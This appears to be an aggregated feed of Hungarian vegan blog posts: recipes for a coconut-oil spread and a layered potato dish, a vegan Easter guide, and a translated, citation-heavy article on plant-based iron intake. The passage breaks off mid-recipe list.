Aki szereti a magyaros, hagyományos ízvilágú zsíros kenyeret, az értékelni fogja ezt a receptet. Bár túl zsírosan étkezni egyáltalán nem egészséges, de a kókuszolaj még az egészségesebb olajfélék közé tartozik, így időnként beleférhet a fogyasztása. Hozzávalók: 1 dl kókuszolaj 1 nagy paradicsom 1 tv paprika 1 nagy fej hagyma 2 gerezd fokhagyma egy fél alma egy csipet kömény 1 kávéskanál őrölt pirospaprika 1 kávéskanál petrezselyem kevés lestyán (kihagyható) natúr ételízesítő (kihagyható) 1 teáskanál mustár só, bors ízlés szerint A kókuszolajba teszünk a felszeletelt zöldségeket, hagymákat, fűszereket, almát és sót, és alacsony hőfokon lefedve összefőzzük. Fontos, hogy kókuszolajat használjunk, mert ez szilárdul meg 25 fok alatt. Miután kihűlt, mustárral összeturmixoljuk az egészet ízlés szerint, ki mennyire darabosan szereti. Hűtőben tartva, ahogy írtam, megszilárdul. A képen látható vágódeszka a webshopban megtalálható. The post Vegán pecsenyezsír recept – kenyérre vagy sütéshez egyaránt felhasználható appeared first on VegaNinja.
Megszűnhet a málna- és szedertermesztés Magyarországon
A lengyel és a szerb konkurencia mellett a munkaerőhiány és a változó klíma is egy-egy koporsószög a bocsósgyümölcs-termesztés koporsójában.
Rakott krumpli V
Rakott krumpli = Megunhatatlan klasszikus Vannak napok, hogy annyira kívánom a szóját, aztán van, hogy egy hónapig rá sem nézek. Én még emlékszem arra a régi szójára, amire úgy tekintettünk, mint a legegészségesebb táplálékok egyikére. Nem csak úgy, mint valaminek a helyettesítőjére, nem úgy, mint a vega konyhák mankójára, hanem tényleg úgy, mint konkrét csodaszerre. A legendás Etka anyó megafegyverére, aminek köszönhetően (is) gyógyult ki a bajaiból, és tudta a térde alatt kidugni a fejét 90 éves korában is (így tényleg minden volt, csak nem egy anyóka). Vajon hova lett ez a régi szója? Mi történhetett? Hm. Mára már egy teljesen más, új szóját ismerünk, azt, amitől mindenki fél, a húsevők ujjal mutogatnak rá, a vegák meg szemérmesen hallgatnak róla, ha az ételükbe kerül. Hát, én most nem fogok. :) Mert jól beletettem ebbe a rakottba, ott pompázik magyaros ízekben, a rakott krumplim meg laktató és tápláló verzióban nyomul. Rengeteg friss salátával, jó adag házi savanyúval isteni ebéd lesz belőle. U.I. Ha rakott krumpli, én két tányérral állok sorba, így nincs is mit csodálkozni azon, hogy ez már az ötödik verzió a Kertkonyha történetében. Ez nem is sok! Évente egy új… Bónusz track: a korábbi verziókat a bejegyzés legvégén találod. :) Hozzávalók egy kisebb sütőtálhoz: - 1,5 kg krumpli - 100 g szójagranulátum - egy marék szárított paradicso - 1 gerezd fokhagyma - kömény, pirospaprika és só ízlés szerint - olaj - Kezdd azzal, hogy leforrázod a szójagranulátumot. Önts rá annyi vizet, hogy ellepje. Elég neki pár perc, és ezalatt megcsinálhatsz minden mást. - A krumplit főzd meg hámozva és egészben. - Készítsd elő a sütőtálat, a fűszereket is. Vágd fel a paradicsomot kisebb darabokra, a fokhagymát is reszeld le, az a legjobb. A szójagranulátumot csepegtesd még le, ha maradt volna alatta víz. - Ezután csak le kell rakni mindent rétegezve a tepsibe. :) Kezd egy kis olajjal, majd az 1 cm vastag karikákra vágott krumplival, aztán jöhet egy kis szója, sok sóval, fűszerekkel. Aztán takard be a maradék krumplival, tüzdeld meg a szárított paradicsommal, a tetejére mehet egy kis olaj még, aztán tedd be az egészet a sütőbe. - 190-200 fokon süsd, amíg szép barna nem lesz a teteje. Ez egy vegán recept volt. :) Hasonló recepteket ITT találsz még. Ha itt feliratkozol , a legújabbakat mindig frissen kapod majd a postaládádba. :) Nézd meg a főzőtanfolyamaimat is: Kezdő Vegán Haladó Vegán (A mindennapi superfood) Vegán MUST HAVE – a kötelező alapcsomag Növényi Tejek és Tejtermékek I Növényi Tejtermékek II Kezdő Vegán Angol nyelven Mustáros rakott krumpli Rakott krumpli Variációk rakott krumplira Medvehagymás rakott krumpli The post Rakott krumpli V appeared first on Kertkonyha.
Steiner Kristóf és Nimrod Dagan lakomája vegán influencereknek
2018. március 20. Zizi kalandjai
Vegán osztálykép - ezen kép fotósa: Birta Endre Március 18-án vasárnap egy különleges baráti ebédre voltunk hivatalosak családilag. Steiner Kristóf volt az ötletgazdája és házigazdája, a párjával Nimrod-dal együtt: 30 magyar vegán influencer, blogger, Youtuber, állatvédő, aktivista és egy Kristófosan csodálatos, fenséges menü - mindez a Vega Randi két ötletgazdájának... Source
Vegán hús-vét – hogyan ünnepeljük a húsvétot vegánként?
Azt gondolod, hogy olyan, hagyományokra épülő ünnepek, mint a Húsvét, kimaradnak a vegánok életéből vagy hatalmas lemondással járnak? Olvasd el összeállításunkat arról, hogyan teremtünk ünnepi hangulatot úgy, hogy az az állatoknak is ünnep maradjon. Tehát a használatuk nélkül. Eredetileg megjelent: http://veganallatvedelem.hu/csaladi-husvet-vegan-modra/ Hímes tojás Manapság a locsolásért tojás helyett pénzt várnak a fiúk. Kétségtelen, hogy pénzt adni ,,vegánabb, mint tojást, de egyáltalán nem járul hozzá a hagyományőrzéshez és a húsvéti hangulathoz. Ha szeretnéd megőrizni a tojásformát, mint a Húsvét szimbólumát, számos lehetőség adódik ezt az állatok használata nélkül is megtenni. Az ajándékokban vagy a dekorációban használhatsz a tyúkoktól elvett helyett pl. hungarocellből, műanyagból, fából vagy papírból készült tojásokat is. Ételeknél csokiból vagy bármilyen növényi alapú ételből varázsolhatsz egy tojás alakú sütőforma segítségével húsvéti hangulatot. Így az ünnep atmoszférája is megmarad, és az állatokat is békén hagytuk. Tojáskeresés A tojáskeresést a gyerekek izgatottan várják, jó móka minden évben. A vegán családokban sincs ez másképp. A különbség annyi, hogy a szórakozásuk érdekében nem veszik el a tojást a tyúkoktól, hanem a fa, műanyag vagy hungarocell megfelelőjét, esetleg vegán csoki tojást rejtenek el a kertben. A gyerekek öröme ugyanakkora, és így kevesebbet ártunk. Élő nyuszi ajándékba? A nyulak ajándékozása, gyerekjátékként vásárlása nem jófejség. A nyuszi kétségkívül az egyik legaranyosabb állat, a gyerekek nagyon szeretik. Húsvét közeledtével könyörgő szemekkel kérik szüleiket, hogy vegyenek nekik egyet otthonra. A szülőknek ilyenkor döntési lehetőségük van. Az egyik, hogy beadják a derekukat, és ezzel nem csak egy állatkizsákmányoló üzletágat támogatnak, és szenvedést okoznak a cukiságnak, de a gyereküket is arra tanítják, hogy ez így rendben van. A másik, hogy kedvesen elbeszélgetnek csemetéikkel, elmesélik neki, a nyusziknak mennyivel jobb a saját családjuk és barátaik közt élni, a saját céljaikért, mint hozzánk költözni pár hétre. Ne feledd, a nyulak érző lények! Nem szabadna úgy bánnunk velük, mintha tárgyak lennének! A húsvéti nyuszi tartásával az is a gond, hogy az ünnepek elteltével a legtöbb család ráun, továbbadna rajta. A nyulak nagy része ilyenkor menhelyen, vagy még inkább a tányéron végzi. Sokan adják be az Állatkertbe is őket, ám ott sem létezik a nyuszimennyország, ahol hosszú, boldog életet élhetnek. El lehet képzelni, mi lesz a sorsuk. Locsolkodás Bizony, a locsolkodáshoz használt parfümök közt is választható vegán opció, ami nem tartalmaz állati összetevőket és olyan alapanyagot, aminek előállatása állatok szenvedésével járt, valamint nem tesztelték állatokon. Sajnos a parfümöknél nagyon elterjedtek az állatkísérletek, amelyek során a nyulak, rágcsálók iszonyú kínokat élnek át. Válassz erőszakmentes, állatkísérletektől mentes, vegán parfümöt, ezen a két weboldalon találsz listát róluk, sok közülük magyar drogériákban is kapható: http://www.cruelty-free-beauty.hu/markak/ http://lifestyleperfumes.eu/en/brands.html Tojás- és húsételek helyett A leggyakoribb kérdés a vegán Húsvéttal kapcsolatban: milyen ételek kerülnek az ünnepi asztalra? ,,Akkor tojást sem eszel? Meg sonkát sem? És körözöttet? Nem, ezeket valóban nem fogyasztjuk, mi vegánok, legalábbis a hagyományos recept szerint nem. Elkészítjük viszont finom, laktató, vegán változatukat. A Húsvét a tavasz ébredésének, az újjászületésnek, és így a friss zöldségek megjelenésének időszaka is. Az ünnepi lakomát ezekre alapozzuk, de ennél jóval színesebb a paletta. Készítünk vegán ,,tojássalátát, finom húsvéti étel még a bioboltokban kapható vegán kis-gömböc, ami búzahúsból készül, és a kötözött sonka vegán megfelelője, vagy kimérve is vehetünk vegán sonkát a 827 Kitchen nevű budapesti étteremben, elvitelre is. Ahogy mások is, mustárral, tormával és kenyérrel fogyasztjuk. Vegán pékségben (pl. FillGood) vásárolható vagy otthon készíthető kalács, kölesből készült körözöttet is eszünk, a hagyományos magyaros fűszerezéssel. Levesrajongóknak egy zöldségekben gazdag zsenge zöldborsólevest ajánlunk. Tavaszi finomság, és így nyugodtan kerülhet a húsvéti menübe is a sült spárga-újburgonya-újhagyma egytálétel. Zöld-fűszeres szójajoghurttal tálaljuk, a húsevő rokonok is imádják. A menü lezárásaként pedig az édességekről sem kell lemondanunk. Vegán torták százaiból válogathatunk, egyik finomabb, mint a másik. A húsvéti menühöz további remek ötleteket adnak Nagy Zita receptjei a https://www.zizikalandjai.com/ oldalon, vagy a VegaNinja receptek. Írta: Gacsó Anikó, a bebispenot.hu blog szerzője The post Vegán hús-vét – hogyan ünnepeljük a húsvétot vegánként? appeared first on VegaNinja.
Vasaljuk ki a tényeket, avagy “Miért a növényi vas a legjobb?”
2018. február 25. Vegán lettem
Vashiány okozta betegségek, fakó bőr és vérszegénység. Ez vár a vegánokra. Vagy mégsem? 2017-ben egy 59 forrásra hivatkozó tanulmányban cáfolták ezen hiedelmeket. Az eredeti tanulmány szerzője és angol címe: Dr Justin Butler – Ironing out the facts (Why plant iron is the best) LINK az eredeti tanulmányhoz. Fordította: Kertész Tibor A fordítást lektorálta és a stilisztikai helyreigazítását végezte: Garai Attila (Biológus, az Orvosi továbbképző szemle szerkesztője) Az egyik legelterjedtebb táplálkozási mítosz, hogy a vegetáriánusok és a vegánok esetében nagyobb a vashiányos vérszegénység kockázata, mivel nem fogyasztanak húst. Ez egyszerűen nem így van, és ebben számos nagy egészségügyi szervezet, mint a Brit Orvosok Szövetsége (BMA), az Egészségügyi Világszervezet (WHO) és az Amerikai Dietetikusok Szövetsége (ADA) is egyetért. Azonban egyes ,,egészségügyi szervezetek, egészségügyi szakértők és táplálkozási szakírók továbbra is úgy népszerűsítik a vörös húst, mint a legjobb vasforrást. Egyikük sem említi azonban a húsban található vas egészségügyi kockázatait a növényi vassal szemben. Ez a cikk leleplezi ezt a nyugati társadalmakban élő mítoszt, amely a húst remek vasforrásként reklámozza, és elmagyarázza, miért jobb a növényi vas. Mi a vas, és miért van rá szükségünk? A vas a vörösvérsejtekben található festékanyag, a hemoglobin alapvető eleme. Segíti az oxigén szállítását a test minden részébe, elengedhetetlen az élethez. Ha a vasbevitel alacsony, a vörösvérsejtekben lévő hemoglobin mennyisége csökkenhet, ami vashiányos vérszegénységhez vezethet. A tünetek közé tartozik a fáradékonyság, a gyengeség, a szédülés, a hidegérzet és a figyelemösszpontosítás zavara. Mennyi vasra van szükségünk? Az Egyesült Királyságban a javasolt tápanyagbevitel (RNI) a felnőtt férfiak számára napi 8,7 mg, míg nők számára 50 éves korig napi 14,8 mg (Egészségügyi Minisztérium, 1991). A nőknek nagyobb a vasigényük, mert a menstruációval vasat is vesztenek. A fiatalabb és idősebb csoportokra vonatkozó RNI az alábbi táblázatban található: Ajánlott napi bevitel az Egyesült Királyságban Életkor mg vas 0-3 hónap 1,7 4-6 hónap 4,3 7-12 hónapos 7,8 1-3 év 6,9 4-6 év 6,1 7-10 év 8,7 Férfi, 11-18 év 11,3 Férfi, 19 év felett 8,7 Nő, 11-50 év 14,8 Terhes nő 27,0 Posztmenopauzális nő (50+ év) 8,7 Forrás: Egészségügyi Minisztérium, 1991. Étrend-kiegészítők A vaspótló készítmények túladagolása székrekedéshez, hányingerhez, hányáshoz, gyomorfájáshoz vezethet, nagyon nagy dózis, különösen a gyermekeknél, akár végzetes is lehet (FSA, 2003). Továbbá nem minden vaspótló azonos. Például a két vegyértékű vasat tartalmazó vas(II)-szulfát (amelyet számos háziorvos felír) hányingert és székrekedést okozhat, valamint akadályozhatja az E-vitamin felszívódását. Az egyéb formák jobban tolerálhatók, például a vas-pikolinát, a vas-citrát és a vas-biszglicinát. A vas kiegészítők növényi formái, mint a Floradix és a Flavoravital, amelyeket bio- és gyógynövényboltokban árulnak, kíméletesek a szervezethez. A VVF (Vegetarian & Vegan Foundation, a cikk írója a szervezet tagja) azt javasolja, hogy forduljon táplálkozási szakértőhöz, mielőtt táplálékkiegészítőt alkalmazna. A legtöbb ember hozzájut az összes szükséges vashoz változatos és kiegyensúlyozott étrend fogyasztásával. A vas fajtái Az élelmiszerekben kétféle vas van: Hem vas az állati szövetekben található. Ez a vas a hemoglobin (oxigént szállító fehérje a vérben) és a mioglobin (oxigént szállító molekula az izomban) része. A hem vas a vörös húsokban, baromfihúsban és halakban található vas körülbelül felét teszi ki. Nem hem vas alkotja a vastartalom másik felét az állati szövetekben és a teljes vastartalmat a növényi élelmiszerekben, a tejtermékekben (amelyek nagyon kis mennyiséget tartalmaznak) és a tojásban. Az átlagos brit étrendben található vas körülbelül 90 százaléka nem hem vas, a többi 10 százalék főleg a hús hemoglobinjából származó hem vas (Bull és Buss, 1980). Az Egyesült Királyság Élelmiszer Szabványügyi Hivatala (FSA) a 2003-as Országos Élelmiszer- és Táplálkozási Felmérésben vizsgálta a vasforrásokat, és megállapította, hogy az összes (hem és nem hem) vas 17 százaléka húsból, 3 százaléka halból, és 1 százaléka tejtermékekből származik. A táplálékban lévő vas túlnyomó többsége (több mint 75 százalék) növényi alapú élelmiszerekből származik. A gabonafélék (például a teljes kiőrlésű tészta, a barna rizs és a teljes kiőrlésű kenyér) teszik ki a legnagyobb hányadot 44 százalékkal (FSA, 2003a). Ez jól mutatja, hogy a legjelentősebb vasforrásaink a növényi élelmiszerek, a húsfogyasztók és a vegetáriánusok/vegánok számára egyaránt. A növényi táplálékok vastartalma A következő táblázat azt mutatja, hogy a növényi élelmiszerek bővelkednek vasban. A hüvelyesek (borsó, bab és lencse) és a szójatermékek (mint például a szójatej és a tofu) kiváló vasforrások. Ugyanígy a sötétzöld leveles zöldségek (mint a brokkoli, a kínai kel és a vízitorma), a dúsított reggeli gabonapelyhek, a teljes kiőrlésű gabonafélék (mint a teljes kiőrlésű kenyér, a barna rizs és a teljes kiőrlésű tészta), az aszalt gyümölcsök (pl. mazsola, szilva, kajszibarack és füge), a fekete melasz és a fekete csokoládé. Egyes növényi élelmiszerek vastartalma (átlagos adag) mg vas napi RNI százaléka Férfiak (8,7 mg) Nők (14,8 mg) Sült bab (135g) 1,9 22 13 Korpa pehely (40g) 9,7 111 66 Tofu (100g) 3,5 40 24 Vesebab (90 g) 1,8 16 12 Vörös lencse (120 g) 2,9 33 20 Spagetti (220g) 3,1 36 21 Barna rizs (180g) 0,9 10 6 Fodros káposzta (95g) 1,9 22 13 Brokkoli (85g) 0,9 10 6 Szezámmag (12g) 1,3 15 9 Tökmag (12g) 1,8 21 12 Aszalt szilva (hat darab, szárított, 48g) 1,2 14 8 Füge (három darab, szárított, 60g) 2,5 29 17 Forrás: FSA (Food Standards Agency) 2002. (További magas vastartalmú növényekről találsz infót a “Vitaminok és nyomelemek a növényekben” című cikkben.) A vas felszívódása Mind a hem, mind a nem hem vas a vékonybélben szívódik fel, de különböző mechanizmusok segítségével. Úgy gondolják, hogy a hem vas a bél nyálkahártyáján (bélfalon) át jut a véráramba, ahol a vas lehasad róla, és egy központi vasraktárba jut a nem hem vassal együtt (Geissler és Powers, 2005). Ez a folyamat független attól, hogy mennyi vas van a szervezetben (vasstátusz) és hogy milyen összetevők vannak még a táplálékban. Ezért szívódik fel könnyebben a hem vas, mint a nem hem vas. Becslések szerint 15-35%-os a hem vas és 2-20%-os a nem hem vas felszívódása (Monsen, 1988). A nem hem vas felszívódása a belekben nagyon változó, olyan tényezőktől is függ, mint a vas státusz és más élelmiszerek jelenléte az étkezésben. Számos táplálkozási tényező befolyásolja a nem hem vas abszorpcióját. A nagy arányú felszívódás nem feltétlenül jó dolog, mivel nincs olyan mechanizmus, ami a felesleges vasat eltávolítaná a szervezetből. Más szavakkal, a növényekből származó vas előnyösebb a szervezet számára, mert a felszívódása biztonságosan szabályozott. Ezzel szemben az állati eredetű vas felhalmozódhat olyan mennyiségben, ami káros lehet (lásd a továbbiakban). A vas felszívódását csökkentő tényezők Fitát A fitát (inozitol-hexafoszfát) hántolatlan gabonaszemekben, magvakban és hüvelyesekben található (amelyek szintén gazdag vasforrások); A korpa különösen gazdag forrás. A fitát erősen megköti a vasat és más ásványi anyagokat (beleértve a kalciumot, a magnéziumot és a cinket), és hiányt okozhat, ha ezeknek az ásványi anyagoknak a bevitele nem kielégítő. Például a harmadik világban azért gyakori a vashiány a gyerekek körében, mert alacsony a vasfelszívódás a rizsből, kukoricából, búzából, zabból vagy cirokból készült kásákból, gabonapelyhekből (Hurrell és mtsai, 2003). Számos lehetőség van a fitát hatásainak leküzdésére. Segíthet, ha a vasban gazdag élelmiszereket magas C-vitamin-tartalmú ételekkel együtt fogyasztjuk (lásd lent). A főzés is növelheti a rendelkezésre álló vas mennyiségét (Viadel és mtsai., 2006; Bishnoi és mtsai 1994). Egy tanulmány kimutatta, hogy 48 különböző zöldség közül 37 szolgáltatott több vasat főzés után (Yang és mtsai, 2002). A rendelkezésre álló vas mennyisége a főtt brokkoliban ötszörösére, a főtt káposztában háromszorosára növekedett. A kenyér fermentálási (kovászolási) időtartamának növelése szintén csökkenti a fitáttartalmat (Nävert és mtsai., 1985). A gabonák, a magvak és a hüvelyesek csíráztatása szintén hatékony módszer, mivel a fitát a csírázásnál felszabadul. A vizsgálatok azt mutatják, hogy a csíráztatás és a hántolás akár 92 százalékkal csökkentette a fitáttartalmat a rizsben és a mungóbabban (Marero és mtsai, 1991) és 20-62 százalékos mértékben növelte a vasabszorpciót a különböző gabonákból és hüvelyesekből (Hemalatha és mtsai., 2007). Ne feledjük azonban, hogy a teljes kiőrlésű kenyér és a barna rizs két-háromszor annyi vasat tartalmaz, mint a fehér kenyér vagy a fehér rizs (Craig és mtsai 1994). Tehát ha a teljes kiőrlésű gabonákból kisebb arányú is a felszívódás, a szervezetbe jutó vas mennyisége így is közel azonos. Magasabb vitamin-, ásványianyag- és rosttartalmuk miatt ezek az élelmiszerek jobb hatással vannak egészségünkre. Polifenolok és a tannin A polifenolok a növényekben található kémiai anyagok egy csoportja. Antioxidáns tulajdonságokkal rendelkeznek, ami olyan jelentős egészségügyi előnyökkel jár, mint a szív- és érrendszeri betegségek (CVD) és a rák kockázatának csökkentése. A tanninok (avagy csersavak) a polifenolok egyik csoportja, például a teában és a vörösborban találhatóak meg. A nem hem vassal komplexeket képeznek, amelyek csökkenthetik a vasfelszívódást (Brune és mtsai., 1989). A tanninok ilyen hatása aggaszthatja azokat, akik rendszeresen fogyasztanak bort az étkezésekhez, viszont a borban lévő alkohol fokozhatja a vas felszívódást (a gyomorsav-kiválasztás stimulálásával), és egyes kutatók megállapították, hogy a vörösborban lévő fenolok hatása aligha befolyásolja jelentősen a szervezet vasegyensúlyát (Cook és mtsai., 1995). Egymásnak ellentmondó információink vannak arról, hogyan hat a teázás a vasstátuszra. A kutatási eredmények azt mutatják, hogy a teafogyasztás nem befolyásolja a vasstátuszt egészséges, kiegyensúlyozottan táplálkozó és elegendő raktározott vassal rendelkező embereknél (Temme és Hoydonck, 2002; Nelson és Poulter, 2004). Ha aggódik a vasszintje miatt és teát fogyaszt az étkezésekhez (vagy csak a reggelihez), fogyasszon inkább frissen facsart narancslevet (a C-vitamin-tartalom fokozza a vas felszívódását), és a teázással várjon legalább egy órát az étkezés után. Kalcium Egyes tanulmányok azt mutatják, hogy a tehéntej fogyasztása étkezés közben csökkentheti a vas felszívódását. Ez a gátló hatás valószínűleg összefügg a tejben lévő tejfehérjével, a kazeinnel (Hurrell és mtsai., 1989) és a kalciummal (Hallberg és mtsai., 1991). A fitáttal és a tanninnal ellentétben a kalcium egyaránt csökkenti a nem hem és a hem vas felszívódását (Fairweather-Tait, 2004), és ez a gátló hatás nem semlegesíthető sem C-vitaminnal, sem más savakkal. A szakértők szerint a kalcium azáltal akadályozza a vas felszívódását, hogy csökkenti a fitát bontását. Az egyik kísérletben mindössze 40 mg kalciumot adtak 80 g liszthez, és ez 50 százalékkal csökkentette a fitátbontást (Hallberg és mtsai., 1991). A kalciumnak emellett közvetlen vasfelszívódást gátló hatása is van. Ugyanebben a kísérletben 165 mg kalcium (például tej, sajt vagy kalcium-klorid formájában) 50-60 százalékkal csökkentette a vasfelszívódást. A kutatók arra a következtetésre jutottak, hogy a napi étkezéseinkben előforduló kalciummennyiség komoly hatással van a táplálkozásunkra. Ez nem jelenti azt, hogy korlátozni kell a kalciumbevitelt; a kalcium nagyon fontos ásványi anyag. Azonban a vasfelszívódásra gyakorolt kedvezőtlen hatása miatt ne igyon tehéntejet és ne fogyasszon kalcium tartalmú étrend-kiegészítőket étkezéskor. Oxálsav Az oxálsav megtalálható számos növényben, például a spenótban, a mángoldban és cékla levelében. Teában, csokoládéban és egyéb kakaós termékekben is előfordul. Képes a kalciummal és a magnéziummal oldhatatlan sókat alkotni, amelyek csökkentik e fontos ásványi anyagok felszívódását. Egyes adatok arra mutatnak, hogy az oxálsav közvetlenül is akadályozhatja a vas felszívódását. Azonban a legújabb kutatási eredmények azt mutatják, hogy a gyümölcsökben és zöldségekben lévő oxálsav csekély hatással van a vasháztartásra (Bonsmann és mtsai., 2008). A vas felszívódását elősegítő tényezők C-vitamin A gyümölcsökben és zöldségekben bőségesen megtalálható C-vitamin (aszkorbinsav) jelentősen növelheti a vasfelszívódást (Hunt és mtsai., 1990; Sharma és Mathur, 1995). Ezt a következő két mechanizmus által éri el: a vasat oldható, könnyebben felszívódó formába konvertálja, illetve kötést képez vele, így megakadályozza, hogy a vas a fitátokkal vagy tanninnal komplexeket alkosson (Fairweather-Tait, 2004). Már nyolc szem földieper vagy 200 ml narancslé C-vitamin-tartalma (75 mg) három-négyszeresére növelheti a vas felszívódását (Craig, 1994). Ha növelni szeretné a vasfelszívódás mértékét, helyettesítse a reggeli csésze teát vagy kávét egy pohár frissen facsart narancslével. Ha aggódik az alacsony vasszintje miatt, akkor próbálja együtt fogyasztani a magas C-vitamin-tartalmú és a vasban gazdag ételeket. Ebben segítenek alábbi javaslataink. Hús Kimutatták, hogy kis mennyiségű hús (körülbelül 50 gramm) növeli a nem hem vas felszívódását olyan ételekben, amelyek nagy koncentrációban tartalmaznak fitátot, viszont C-vitaminban szegények (Baech és mtsai., 2003). Több kutatócsoport megpróbálta meghatározni a megfoghatatlan ,,hústényezőt. A potenciális jelöltek közé tartoznak bizonyos, húsban található aminosavak (a fehérjék építőkövei), amelyek átalakíthatják a nem hem vasat könnyebben felszívódó formába. Illetve lehet a hatás kiváltója az izomszövet egyik komponense, az L-alfa-glicero-foszfokolin (Armah és mtsai, 2008). Azonban a C-vitamin a nem hem vas felszívódását erősebben segíti elő, mint a hús (Baech és mtsai., 2003), és ha a C-vitamin-bevitel megfelelő, akkor a húsnak csak csekély hatása lehet. (Az állatok ételként, valamint tárgy és tulajdonstátuszában kezelését teljes mértékben elutasítja a blog a tulajdonosa, a cikk fordítója és lektora egyaránt. Az állatok nem tárgyak, nem alapanyagok, vagy alapanyag termelő gépek, ugyanakkor a tisztánlátás, a tárgyilagosság fontossága, és a hitelesség végett, a “hús” mint megszokott alapanyag kifejezés használatát az eredeti formájában hagytuk meg. – szerk.) A vasstátusz mérése Az emberi test vasstátuszának értékelésére számos különböző módszer létezik. A két leggyakoribb módszer a hemoglobin és a szérumferritin mérése. A ferritin egy fehérje, amely három vegyértékű (ferri) vas formájában vasat tárol a szervezetben. A vérben lévő ferritin mennyisége tükrözi, hogy mennyi vasat tárol a szervezet későbbi felhasználásra. Lehetséges, hogy önnek normális a hemoglobinszintje, de közben alacsony a ferritinszintje. A ferritinszint hosszú távú vashiány miatt lehet alacsony, vagy ha a szervezet alultápláltság miatt fehérjehiányos állapotban van. Értelemszerűen a ferritinszint akkor magas, ha hosszú távon több vasat fogyasztunk a szükségesnél. Ha úgy gondolja, hogy túl kevés (vagy túl sok) a vas a vérében, vérvizsgálatot kérhet. A nyugati társadalmakban az alacsony vasszintet és a vashiányos vérszegénységet hosszan tartó vagy súlyos vérzés (például menstruáció), várandósság vagy a hirtelen növekedés okozza, nem az elégtelen táplálkozás. Túl magas vasszintet genetikai állapot, jelentős mennyiségű vérátömlesztés vagy a vaspótló készítmények túladagolása okozhat. Állapot jelző Normál szint (egy liter vérben) Szérumferritin 30-300 mikrogramm Hemoglobin 120-180 gramm Forrás: Sharp, P. 2005. Vashiány A vashiány a legelterjedtebb táplálkozási probléma a világon (Sharp, 2005). Valójában a világ népességének egynegyede vashiányos lehet, és körülbelül 500 millió ember szenved vashiányos vérszegénységben (Cook és mtsai., 1994). A tünetek közé tartozik a fáradékonyság, sápadtság és a legyengült immunrendszer. A vashiányos vérszegénységben szenvedő gyermekeknél a csökkent figyelem-összpontosító képesség iskolai problémákhoz is vezethet (Grantham-McGregor és Ani, 2001). Az FSA kijelenti, hogy vashiány szempontjából a következő csoportok a legveszélyeztetettebbek: hat hónapos kor feletti csecsemők, kisgyermekek, serdülők és terhes nők, mert nekik az átlagosnál több vasra van szükségük (FSA, 2003). Az elégtelen felszívódás okozhat gondot az idős embereknél és azoknál, akik vasfelszívódást gátló ételeket fogyasztanak. A menstruáló nők és akik kórosan sok vért veszítettek, szintén veszélyeztetettek. Egy, az Egyesült Királyságban végzett vizsgálat a menstruációs vérveszteséget és az étrendet vizsgálva arra a következtetésre jutott, hogy bár az étrend is fontos tényező, a menstruáció van a legjelentősebb hatással a vasstátuszra (Harvey és mtsai., 2005). Az FSA nem tartja a vegetáriánusokat és a vegánokat veszélyeztetett csoportnak. Növényi étrendek és a vas A különböző vegetáriánus étrendeket vashiányos táplálkozásként jellemezték, bár számos tanulmány kimutatta, hogy valójában a rosszul megtervezett étrend okozza a problémát (Leitzmann, 2005). A jól kiegyensúlyozott vegetáriánus vagy vegán étrend rengeteg vasat biztosít. A nyugati társadalmakban a vegetáriánus vagy vegán étrend ugyanannyi vagy még több vasat tartalmazhat, mint a húst tartalmazó vegyes étrend (Harvey és mtsai., 2005; Hunt, 2003). A vegetáriánusok és a vegánok még a nagy rosttartalmú (és ezáltal sok fitátot tartalmazó) táplálékkal is hasonló mennyiségű vasat vittek be, mint a húsevők (Craig, 1994). Egy friss tanulmány összehasonlította 33 000 húsevő, 10 000 halfogyasztó, 18 000 vegetáriánus és 2500 vegán vizsgálati személy vasbevitelét, és megállapította, hogy a vegánok bevitele a legnagyobb. Őket a halfogyasztók és a vegetáriánusok követték, a húsevők bevitele volt a legalacsonyabb érték (Davey, és mtsai., 2003). A vegetáriánusok szervezete hajlamosabb kevesebb vasat raktározni (szérumferritin), mint a húsevőké. Ennek okai a következők lehetnek: a hem vas könnyebben felszívódik, mint a nem hem vas; a hús fokozza a nem hem vas felszívódását; illetve a vegetáriánus étrend nagyobb mértékben tartalmazhat olyan vasfelszívódást gátló összetevőket, mint a fitát, a csersav és a kalcium (Harvey és mtsai., 2005). Ennek ellenére a vegetáriánusok között nem gyakoribb a vashiányos vérszegénység előfordulása. A Brit Orvostársaság és az Amerikai Dietetikus Társaság (British Medical Association és az American Dietetic Association) egyetért abban, hogy a vegetáriánusoknak nincs nagyobb esélyük a vashiányra, mint a húsevőknek (BMA, 1986, American Dietetic Association, 2003). Bár a vegetáriánusok szervezete kevesebb vasat raktároz, ennek kedvezőtlen egészségügyi hatását nem mutatták ki a változatos vegetáriánus étrendek egyikéről sem a fejlett országokban. Valójában a mérsékelten kevesebb vas raktározása csökkenti bizonyos krónikus betegségek kockázatát (Hunt, 2003). Ismert tény, hogy sok húsfogyasztónál vastöbblet keletkezik, ami növeli a szív- és érrendszeri megbetegedések (CVD) és bizonyos rákos megbetegedések kockázatát (Leitzmann, 2005). Túl sok a jóból? A túl sok vas a szervezetben mérgező. Ennek ellenére széles körben elterjedt az a meggyőződés, hogy minél több vas van az étrendben, annál jobb. Egyes táplálkozási és dietetikai tankönyvekbe ezt még mindig beleírják. Számos tanulmány azt mutatja, hogy a jelentős vastöbblettel rendelkező betegek esetében nagyobb a szív- és érrendszeri betegségek (CVD), bizonyos daganatos betegségek és más egészségügyi problémák előfordulásának aránya. Vastöbbletet egy örökletes állapot is okozhat (veleszületett hemokromatózis), ami 250 emberből egyet érint (észak-európai származásúaknál) (Burke és mtsai., 2000). Általában a máj csak annyi vasat tárol, amennyi az új vörösvérsejtek létrehozásához szükséges. Ha a szervezetbe túl sok vas szívódik fel (ami ebben a betegségben előfordulhat), akkor ez felhalmozódik a májban, illetve más szövetekben és szervekben is lerakódik. A vastúltengés olyan kellemetlen tüneteket okozhat, mint a hányinger, hasi fájdalom, székrekedés és ízületi fájdalom. Májkárosodáshoz, szívelégtelenséghez és cukorbetegséghez is vezethet (NHS Direct, 2008). A férfiakra veszélyesebb a veleszületett hemokromatózis, mert nem veszítenek rendszeresen vért (és egyben vasat), mint a nők a menstruáció során. Ez a körülmény is azt mutatja, hogy bizony a jóból is megárthat a sok. Vasban gazdag receptek A következő ételek segítenek fokozni a vasbevitelt a vasban gazdag és a vasfelszívódást elősegítő táplálékok kombinálásával. Reggeli - Sült bab és/vagy tofu-,,rántotta teljes kiőrlésű pirítóssal - Zabkása szója-, rizs- vagy zabtejjel, aszalt gyümölcsökkel (például füge vagy aszalt szilva) és lenmaggal a tetején - Frissen facsart narancs- vagy grépfrútlé a fentiekkel Ebéd - Vízitorma saláta datolyával, pirított tökmaggal és narancsszeletekkel - Babsaláta (konzerv vegyes bab, zeller, olívaolaj, fokhagyma, 